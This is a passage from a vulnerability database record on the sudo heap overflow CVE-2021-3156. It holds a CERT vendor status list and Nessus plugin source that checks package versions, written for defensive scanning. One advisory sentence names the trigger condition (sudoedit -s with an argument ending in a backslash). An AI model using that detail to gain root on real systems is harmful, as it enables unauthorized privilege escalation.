Affected\n\nNotified: 2021-02-04 Updated: 2021-02-24\n\n**Statement Date: February 23, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://www.synology.com/zh-tw/security/advisory/Synology_SA_21_02>\n\n### Ubuntu __ Affected\n\nUpdated: 2021-02-04\n\n**Statement Date: January 26, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n#### References\n\n * <https://ubuntu.com/security/CVE-2021-3156>\n\n### Wind River __ Affected\n\nNotified: 2021-02-04 Updated: 2021-02-08\n\n**Statement Date: February 08, 2021**\n\n**CVE-2021-3156**| Affected \n---|--- \n \n#### Vendor Statement\n\n\"Heap-based buffer overflow in sudo\" affects the Wind River Linux product.\n\n### Android Open Source Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-08\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nAndroid is not impacted as it does not have SUDO.\n\n### eCosCentric Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FreeBSD Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-08\n\n**Statement Date: February 08, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWhile the base FreeBSD installation does not include sudo and is therefore not directly affected by this vulnerability, the FreeBSD Project recognises that sudo is a very popular package for users to install on FreeBSD.\n\nUsers can install sudo on FreeBSD using ports or binary packages. The sudo port was updated to 1.9.5p2 on 2021-01-26 at 20:15:31 (main) and on 2021-01-26 20:40:57 (2021Q1 quarterly). Binary packages are available for all tier-1 supported platforms (amd64, i386, aarch64) and several tier-2 supported platforms.\n\n### Green Hills Software Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 04, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Illumos __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-10\n\n**Statement Date: February 10, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nillumos itself does not have sudo in its source. Illumos distros, however, do.\n\nA NOTE: base illumos has the RBAC/profile-based pfexec(1) family of commands that are an alternative for sudo.\n\nSmartOS: Use `pkgin upgrade` on any zones that have sudo installed.\n\nOmniOSce and OpenIndiana (both use the IPS package system): Use `pkg update` to obtain the latest sudo if it's installed.\n\nDilos: Is fixed in update https://bitbucket.org/dilos/du2/commits/ca5129c54c84d7b2fd75d17e465e970435018f55 - a Debian-style update will install it.\n\nTribblix: If sudo is installed, `zap refresh && zap update sudo`\n\n### Microsoft Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-15\n\n**Statement Date: February 12, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Zephyr Project __ Not Affected\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Not Affected \n---|--- \n \n#### Vendor Statement\n\nThe Zephyr project is an embedded RTOS, and as such, does not directly have the capability to run sudo. However, there are few instances of sudo in the project scripts and documentation.\n\n * Numerous instances throughout the documentation of suggestions to run a command with sudo. Generally, these are platform package management commands, in order to install dependencies needed to build Zephyr. It is assumed that the developer already has privileges necessary to run these commands, and this exploit would not gain additional privileges.\n * sudo is used in CI to install dependencies needed to run the tests. These operations are run in a containered environment, and sudo is configured to run without requesting a password. Again privileges are required to run the tests, and no additional privileges are gained through this exploit.\n\n### ADATA Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### AirWatch Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Alpine Linux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Altran Intelligent Systems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Amazon Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Apple Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arch Linux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Arista Networks Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### BlackBerry Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Blackberry QNX Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Blunk Microsystems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### CMX Systems Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Contiki OS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Cricket Wireless Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell EMC Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Dell SecureWorks Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### DesktopBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### DragonFly BSD Project Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### ENEA Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Express Logic Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FNet Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### FreeRTOS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Google Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hewlett Packard Enterprise Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Hitachi Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HP Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### HTC Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-05\n\n**Statement Date: February 05, 2021**\n\n**CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Huawei Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Corporation (zseries) Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Numa-Q Division (Formerly Sequent) Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Juniper Networks Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Lenovo Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LG Electronics Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### LITE-ON Technology Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Lynx Software Technologies Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### m0n0wall Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Marconi Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Micro Focus Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NEC Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nexenta Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenBSD Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### OpenIndiana Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Phoenix Contact Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Roku Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Samsung Mobile Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Schneider Electric Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sierra Wireless Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Slackware Linux Inc. Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SonicWall Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Sony Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### The OpenBSD project Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Tizen Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-24 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Treck Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TrueOS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Turbolinux Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Unisys Corporation Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Univention Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Xiaomi Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### XigmaNAS Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Xilinx Unknown\n\nNotified: 2021-02-04 Updated: 2021-02-04 **CVE-2021-3156**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 87 vendors __View less vendors __\n\n \n\n\n### References \n\n * <https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit>\n * <https://www.zdnet.com/article/recent-root-giving-sudo-bug-also-impacts-macos/>\n * <https://twitter.com/hackerfantastic/status/1356645638151303169>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-3156 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-3156>) \n---|--- \n**Date Public:** | 2021-02-04 \n**Date First Published:** | 2021-02-04 \n**Date Last Updated: ** | 2021-02-24 13:59 UTC \n**Document Revision: ** | 11 \n", "modified": "2021-02-24T13:59:00", "published": "2021-02-04T00:00:00", "id": "VU:794544", "href": "https://www.kb.cert.org/vuls/id/794544", "type": "cert", "title": "Heap-Based Buffer Overflow in Sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-02-06T14:12:52", "description": "The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2021:0220 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "RHEL 8 : sudo (RHSA-2021:0220)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["cpe:/o:redhat:rhel_eus:8.1", "cpe:/o:redhat:rhel_e4s:8.1::baseos", "cpe:/o:redhat:rhel_e4s:8.1", "p-cpe:/a:redhat:enterprise_linux:sudo", "cpe:/o:redhat:rhel_eus:8.1::baseos"], "id": "REDHAT-RHSA-2021-0220.NASL", "href": "https://www.tenable.com/plugins/nessus/145494", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2021:0220. The text\n# itself is copyright (C) Red Hat, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145494);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"RHSA\", value:\"2021:0220\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"RHEL 8 : sudo (RHSA-2021:0220)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Redhat Enterprise Linux 8 host has a package installed that is affected by a vulnerability as referenced in\nthe RHSA-2021:0220 advisory.\n\n - sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://cwe.mitre.org/data/definitions/122.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2021-3156\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2021:0220\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1917684\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected sudo package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-3156\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sudo Heap-Based Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(122);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/01/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/01/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/01/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_e4s:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:rhel_eus:8.1::baseos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:sudo\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\ninclude('rhel.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (!rhel_check_release(operator: 'eq', os_version: os_ver, rhel_version: '8.1')) audit(AUDIT_OS_NOT, 'Red Hat 8.1', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'rhel_e4s_8_1_baseos': [\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms__8_DOT_1'\n ],\n 'rhel_eus_8_1_baseos': [\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms',\n 'rhel-8-for-aarch64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-rpms',\n 'rhel-8-for-aarch64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms',\n 'rhel-8-for-aarch64-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms',\n 'rhel-8-for-s390x-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-rpms',\n 'rhel-8-for-s390x-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-s390x-baseos-eus-source-rpms',\n 'rhel-8-for-s390x-baseos-eus-source-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-e4s-debug-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-rpms',\n 'rhel-8-for-x86_64-baseos-e4s-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms',\n 'rhel-8-for-x86_64-baseos-eus-debug-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-rpms',\n 'rhel-8-for-x86_64-baseos-eus-rpms__8_DOT_1',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms',\n 'rhel-8-for-x86_64-baseos-eus-source-rpms__8_DOT_1'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2021:0220');\n}\n\npkgs = [\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'aarch64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'s390x', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']},\n {'reference':'sudo-1.8.25p1-8.el8_1.2', 'sp':'1', 'cpu':'x86_64', 'release':'8', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['rhel_e4s_8_1_baseos', 'rhel_eus_8_1_baseos']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'sudo');\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-06T13:24:54", "description": "The remote Oracle Linux 7 host has packages installed that are affected by a vulnerability as referenced in the\nELSA-2021-0221 advisory.\n\n - Sudo before 1.9.5p2 has a Heap-based Buffer Overflow, allowing privilege escalation to root via sudoedit\n -s and a command-line argument that ends with a single backslash character: (CVE-2021-3156)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.", "edition": 4, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-01-27T00:00:00", "title": "Oracle Linux 7 : sudo (ELSA-2021-0221)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-3156"], "modified": "2021-01-27T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:sudo", "p-cpe:/a:oracle:linux:sudo-devel", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2021-0221.NASL", "href": "https://www.tenable.com/plugins/nessus/145461", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2021-0221.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(145461);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2021-3156\");\n script_xref(name:\"IAVA\", value:\"2021-A-0053\");\n\n script_name(english:\"Oracle 